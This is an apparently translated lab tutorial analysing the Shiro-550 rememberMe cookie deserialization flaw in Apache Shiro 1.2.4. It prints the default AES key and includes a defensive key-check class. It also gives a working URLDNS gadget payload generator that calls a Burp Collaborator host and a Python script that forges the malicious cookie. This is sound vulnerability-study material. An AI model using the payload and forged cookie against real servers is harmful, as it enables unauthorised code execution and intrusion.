Shiro
Environment setup
Required environment
jdk8u65
Tomcat8
shiro 1.2.4
For the shiro environment, clone it directly from p神's GitHub repository.
Start Tomcat, and the application can be seen running.
Shiro550 analysis
Vulnerability principle
If the RememberMe box is checked and the login succeeds, the response's Set-Cookie headers contain a rememberMe=deleteMe field and also a rememberMe field; every subsequent request then carries a rememberMe field in its Cookie, so this rememberMe can be used for deserialization, and hence to getshell.
////Request
POST /shirodemo_war/login.jsp HTTP/1.1
Host: 192.168.124.15:8081
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.15:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.124.15:8081/shirodemo_war/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=root&password=secret&rememberMe=on&submit=Login

////Response
HTTP/1.1 302
Set-Cookie: JSESSIONID=1467280596697A870D71F2A15C2E5B84; Path=/shirodemo_war; HttpOnly
Set-Cookie: rememberMe=deleteMe; Path=/shirodemo_war; Max-Age=0; Expires=Mon, 29-Aug-2022 06:06:08 GMT
Set-Cookie: rememberMe=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; Path=/shirodemo_war; Max-Age=31536000; Expires=Wed, 30-Aug-2023 06:06:08 GMT; HttpOnly
Location: /shirodemo_war/;jsessionid=1467280596697A870D71F2A15C2E5B84
Content-Length: 0
Date: Tue, 30 Aug 2022 06:06:08 GMT
Connection: close

The root cause is that the AES encryption key is hard-coded in the source by default (Shiro-550).
Cookie decryption analysis
Searching globally in IDEA for the keyword cookie, the following classes related to the shiro framework are found:
public interface Cookie
public class SimpleCookie implements Cookie
public class CookieRememberMeManager extends AbstractRememberMeManager

Step into CookieRememberMeManager and look at the related functions.
This method first checks whether the base64 cookie value is deleteMe; if so, it returns, otherwise it base64-decodes the value and returns the result. Now look at who calls this method.
Step into convertBytesToPrincipals.
This function decrypts the base64-decoded byte stream and then deserializes it. Step in to see how.
The cipherService is obtained and then the bytes are decrypted.
Here getDecryptionCipherKey() obtains the encryption/decryption key.
Stepping into cipherService shows that AES is used, and the key is the base64-encoded value kPH+bIxk5D2deZiIxcaaaA==.
Summarizing the flow above, shiro's cookie decryption process is:
base64() -> Aes(), after which the serialized content is obtained.
Step into the deserialization function to look further.
Cookie encryption analysis
Set a breakpoint in onSuccessfulLogin.
The token can be seen in plaintext.
Step in.
As can be seen, it is symmetric with the decryption process; this is the complete cookie encryption/decryption flow.
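The decryption flow above (base64, then AES-CBC with a 16-byte IV prefixed to the ciphertext, then Java deserialization) gives a defender a direct check: a rememberMe cookie that decrypts under the default key to a stream starting with the Java serialization magic bytes was issued by an instance still running the hard-coded key. The class below is an added example, not code from the page or from Shiro; the class and method names, the constructed payload (magic bytes plus zero filler), and the helper that builds a cookie in the same layout are assumptions made for the demonstration. The random key it generates is what a fix hands to AbstractRememberMeManager#setCipherKey instead of the default.

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
public class RememberMeKeyCheck {
    // Shiro 1.2.4 default rememberMe key, as found in the analysis above
    static final String DEFAULT_KEY_B64 = "kPH+bIxk5D2deZiIxcaaaA==";
    // Every Java serialization stream starts with these four magic bytes
    static final byte[] SERIAL_MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    // Cookie layout: base64( IV(16 bytes) || AES-CBC-PKCS7(payload) ); true if keyB64 yields a serialization stream
    static boolean decryptsToSerializedObject(String cookie, String keyB64) {
        try {
            byte[] raw = Base64.getDecoder().decode(cookie);
            if (raw.length < 32 || raw.length % 16 != 0) return false;
            Cipher aes = Cipher.getInstance("AES/CBC/PKCS5Padding");
            aes.init(Cipher.DECRYPT_MODE, new SecretKeySpec(Base64.getDecoder().decode(keyB64), "AES"),
                    new IvParameterSpec(Arrays.copyOfRange(raw, 0, 16)));
            byte[] plain = aes.doFinal(Arrays.copyOfRange(raw, 16, raw.length)); // wrong key -> BadPaddingException
            return plain.length >= 4 && Arrays.equals(Arrays.copyOf(plain, 4), SERIAL_MAGIC);
        } catch (Exception e) {
            return false;
        }
    }
    // Mitigation: a random per-deployment key to pass to AbstractRememberMeManager#setCipherKey
    static byte[] freshKey() throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128, new SecureRandom());
        return kg.generateKey().getEncoded();
    }
    // Builds a cookie in the same layout as the flow above (constructed payload, not a real principal)
    static String buildCookie(byte[] payload, byte[] key) throws Exception {
        byte[] iv = new byte[16]; new SecureRandom().nextBytes(iv);
        Cipher aes = Cipher.getInstance("AES/CBC/PKCS5Padding");
        aes.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"), new IvParameterSpec(iv));
        byte[] ct = aes.doFinal(payload);
        byte[] out = Arrays.copyOf(iv, 16 + ct.length);
        System.arraycopy(ct, 0, out, 16, ct.length);
        return Base64.getEncoder().encodeToString(out);
    }
    public static void main(String[] args) throws Exception {
        byte[] payload = Arrays.copyOf(SERIAL_MAGIC, 24); // magic plus zero filler, constructed
        String weak = buildCookie(payload, Base64.getDecoder().decode(DEFAULT_KEY_B64));
        String strong = buildCookie(payload, freshKey());
        System.out.println("default-key cookie flagged: " + decryptsToSerializedObject(weak, DEFAULT_KEY_B64));
        System.out.println("random-key cookie flagged:  " + decryptsToSerializedObject(strong, DEFAULT_KEY_B64));
    }
}
```

The same check can be run over cookies captured at a proxy or gateway to find applications that still ship the default key; the IV/ciphertext split and the magic-byte test are exactly what the decryption path above does before reaching readObject.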
Shiro550 exploitation
DNS probing
URLDNS chain

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class urldns {
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
        HashMap<URL, Object> hashMap = new HashMap<>();
        URL url = new URL("https://fudjktkkeq3jv7koksa072r6exkn8c.burpcollaborator.net");
        Class<URL> urlClass = URL.class;
        Field fieldHashCode = urlClass.getDeclaredField("hashCode");
        fieldHashCode.setAccessible(true);
        // Pre-set the cached hashCode so put() does not resolve the host while the payload is built
        fieldHashCode.set(url, 123456);
        hashMap.put(url, 123);
        // Reset to -1 so hashCode() is recomputed (and the lookup happens) when HashMap.readObject runs
        fieldHashCode.set(url, -1);
        serialize(hashMap);
        //unSerialize("ser.bin");
    }

    public static void serialize(Object obj) throws IOException {
        try (ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            ooStream.writeObject(obj);
        }
    }

    public static Object unSerialize(String fileName) throws IOException, ClassNotFoundException {
        try (ObjectInputStream oiStream = new ObjectInputStream(new FileInputStream(fileName))) {
            return oiStream.readObject();
        }
    }
}

Python encryption script
from Crypto.Cipher import AES
import uuid
import base64

def convert_bin(file):
    with open(file, 'rb') as f:
        return f.read()

def AES_enc(data):
    BS = AES.block_size
    # PKCS7 padding, matching what shiro expects
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="   # shiro's default key, base64-encoded
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes            # random 16-byte IV, prepended to the ciphertext
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
    return ciphertext

if __name__ == "__main__":
    data = convert_bin("ser.bin")
    print(AES_enc(data))
Result:
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
Capture a request, set this cookie, and exploitation succeeds.